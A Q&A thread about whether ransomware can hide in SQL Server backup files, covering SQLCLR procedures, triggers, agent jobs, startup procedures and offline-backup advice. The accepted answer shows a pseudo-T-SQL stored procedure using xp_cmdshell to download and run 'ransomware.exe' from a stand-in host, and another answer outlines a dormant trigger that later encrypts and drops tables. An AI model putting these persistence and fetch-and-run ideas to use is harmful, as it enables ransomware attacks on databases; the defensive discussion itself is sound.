# Can ransomware embed itself in to a SQL backup file?

Tags: sql-server, sql-server-2016, security

One of the best protections against [ransomware](https://en.wikipedia.org/wiki/Ransomware) is to back up all of your database files to a completely separate system.  Which we have done.

But one thought is the backup of the database could potentially now contain the ransomware. Is this possible? This is a 2016 SQL Server native created .bak. Or is it impossible for ransomware to embed itself into a backup file?

Answer (score 6, accepted):

Yes. I've *never* seen this though.

SQL Server has a feature where you can write stored procedures in C#. We looked into using it once. As of a few releases ago, this feature is turned off by default.

So if ransomware turns the feature on, and converts some stored procedures to C# and adds itself, when you restore the backup you will get an error trying to use said stored procedures, and probably turn it on for it. Then the C# code will run.

Now here's where it gets juicy. There have been so many sandbox escape vulnerabilities that MS gave up and deprecated Silverlight and turned off the .NET Stored procedures in SQL Server by default. It would be ill-advised to assume that just because you can't find one that works today there aren't any more left.

A slightly more realistic attack would be modifying a SP that does something along the lines of

```
IF (session is admin)
BEGIN
    -- xp_cmdshell is off by default but this is a speed bump; SQL can just turn it on
    -- I've done it before because I had to put up with surface area configuration broken, but I'm not writing it here
    xp_cmdshell 'powershell wget https://badsite.com/ransomware.exe'
    xp_cmdhsell 'ransomware.exe'
END
```

and then just wait for some sysadmin to execute it. Backups restored on temporary instances rarely are used by properly restricted users. On the other hand, said ransomeware is going to need to be pretty worm-like to get anything that can't just be wiped.

Answer (score 22):

Never say *never*, but since backups aren't executable files and contain no directly executable code (they're about the data, not the SQL Server software itself) I would think the risk is very, *very* low. It would be more likely that your backup files would be the *target* of the ramsomware rather than the agent of infection. Anything executable would have to be executable from *within* the database, like a stored procedure. There are *far* more effective and direct ways for ransomware to spread.

Comment: `master` is effectively executable, as is `msdb`

Comment: Without a SQL Server ecosystem to run it? It isn't compiled binary code itself and any malware embedded as a stored procedure can't self-replicate or *do* anything harmful without taking advantage of a weakness or misconfiguration of the underlying database engine, or the gullibility/inexperience of the DBA.

Comment: If a bug is discovered in the SQL Server, a backup could be modified to abuse that bug and install malware.

Comment: Also requires an actual SQL Server ecosystem, and an insider threat or another attack vector (i.e. the bug) to exploit it. If I've already hacked the system, why infect the backup at all? In general the backup's contents would be *far* more likely to be the target of a ransomware attack than the actual attack vector. There are much easier ways to get malware onto a system, like simple social engineering. Not that it *couldn't* be done, but if you've eliminated everything else and *this* is your primary concern then you're probably doing a better job of cyber security than most others already.

Comment: You mentioned "SQL Server ecosystem" that is required a several times, but I don't understand how a sql server database backup can be useful to anyone without "SQL Server ecosystem". It's like saying that anything on an external hdd is safe because it's not plugged in.

Comment: The more likely attack vector here is your application, not SQL Server itself. Clippy the SQL paperclip isn't going to say "Hey! I see you are trying to restore a backup, and it's got a [PE](https://en.wikipedia.org/wiki/Portable_Executable) blob in a field somewhere so I'm just gonna go ahead and run that for you buddy!". It's much more likely that you have an application that stores data in the database that might become executable if terrible mistakes are made – or, like likely – are intentionally part of the application.

Comment: A contrived example might be extracting "a PDF" to a file and then running it using something like `system("file")`, relying on Windows to figure out how to handle the file type, instead of trying to open it with a specific application. If your "PDF" gets overwritten with Badness, you might be in trouble.

Comment: @AndrewSavinykh A SQL Server backup requires SQL Server (or *some* other program) to do something: open it, restore it, etc., and in so doing allow any malicious stored procedure to execute. Without another application providing a runtime, the backup is just a file or set of files and nothing more. That is what I mean by a SQL Server ecosystem. A backup *by itself* cannot run, encrypt, or replicate anything: it is not compiled, binary executable code - it needs a SQL Server to enable its content to *do* anything.

Comment: The purpose of ransomware is to deny you access to your data, not use your data to propagate. To do *that*, you would still have to be able to access your data and run your stored procedures: it is self-defeating. In the context of ransomware this makes backups an *extremely* unlikely attack vector. It is much more likely that ransomware would be downloaded by an unwary admin, gain elevated system or domain privileges, then encrypt and deny you access to both the active database *and* the backups.

Answer (score 12):

What you typically have to worry about is ransomware finding your backups on the network and encrypting them. When ransomware hits your network, it typically propagates quickly, and locks down everything it can find. If the ransomware obtains domain admin privileges, this typically happens in a matter of minutes.

Worst case scenario, ransomware takes your database server offline, and encrypts all backups as well. If you don’t have offline copies of your backups, it could be challenging, if not impossible, to recover from it. To truly protect yourself, make sure you’re keeping offline copies of your backups.

Comment: I don't understand why admins of critical systems don't rotate backup drives online and off-line.  When ransomware appears, you just disconnect from internet and restore from backups that were unplugged at the time it happened.  Only thing you lose is work done since the backup was disconnected.

Comment: Most modern databases perform incremental backups more often than full backups, and have Recovery Point Objectives that would make switching drives impractical, if not impossible. A more common practice would be to make multiple copies of the backups, say to tape or a cloud storage bucket (object storage, not file storage) that would be safe from malware.

Comment: My comment was in response to @WGroleau. You suggestion is entirely right.

Comment: @pmdba make sure you tag them then, or they won’t get notified of your comment. I only got notified because you commented on my answer.

Comment: @BrendanMcCaffrey yeah, by the time I realized my mistake, the window to edit the comment had closed. Thanks.

Answer (score 5):

Apart from @Joshua's answer on SQLCLR procedures, there are other places that viruses and ransomware can worm into:

- Database level DDL triggers, which would have the benefit of being executed by a DBA, who probably has `sa` rights.

This leads on to some more pernicious places:

- The `msdb` database, in particular the SQL Server Agent Jobs tables, where it could set up a scheduled job to run at particular intervals. This could be in T-SQL, or in Powershell.
- It could worm into the `master` database. If it got into here, there are a few different places it could hide:

  - It could set a DDL trigger, the same as any other database.
  - It could set a Logon trigger, which would execute every time someone logs on, which I think executes as `sa`.
  - It could set up an Automatic Execution procedure, which runs on every start-up. This is done with the [`sp_procoption` system procedure](https://learn.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-procoption-transact-sql?view=sql-server-ver15).
- It could worm into `tempdb`, where it could set up a DDL trigger to fire every time a temp table is created. `tempdb` is not backed up though.
- It could hide in the `model` database, ready to pop out next time you create a new database.

None of these things are possible if permissions on these databases are not changed, and the virus never gets `sysadmin` rights, which admittedly is difficult to prevent.

Note also that the account that SQL Server runs under should be a limited service account rather than `SYSTEM`, which would prevent a complete compromise of the server operating system if SQL Server is compromised in the above fashion.

Note further that if there was a compromise of the operating system up to Administrator/`su` level, consider all the above SQL Server locations suspect. Best practice would be to build the system databases from scratch.

Answer (score 2):

Generally, ransomware runs as a program in your operating system, encrypts files (possibly depending on file type), and, if you're lucky, doesn't leave any time bombs in decrypted exe files later.

However, ransomware could directly target a database, although I'm not aware of any which does that (yet). This would likely be a targeted attack, not a general one, as general attacks try to find as many targets as possible, and there are many more general servers/PCs than database servers.

If I wanted to write some ransomware to target you directly, I'd write a stored procedure and attach it to a trigger somewhere. Make the stored procedure do nothing for a week or two after infection, to make sure current backups contain the stored procedure as well. After two weeks, the stored procedure would start to encrypt your database tables. Make an encrypted copy of every table, which would take a while, then drop the original tables, at which point you'd notice something is wrong.

In that scenario, all your full backups would have the stored procedure and trigger as well, so after restoring a backup your database would seem normal for a while, until the trigger hits again.

Of course, the stored procedure would normally not be able to access your file system (but beware of databases that allow file system access), but a database that becomes unusable every few days is bad enough for your organization.

If you are able to do a clean install of your software, and create an empty database according to vendor specs, then restore *just* the table data (basically, a restore that contains only DML, no DDL statements), you'd get rid of the ransomware.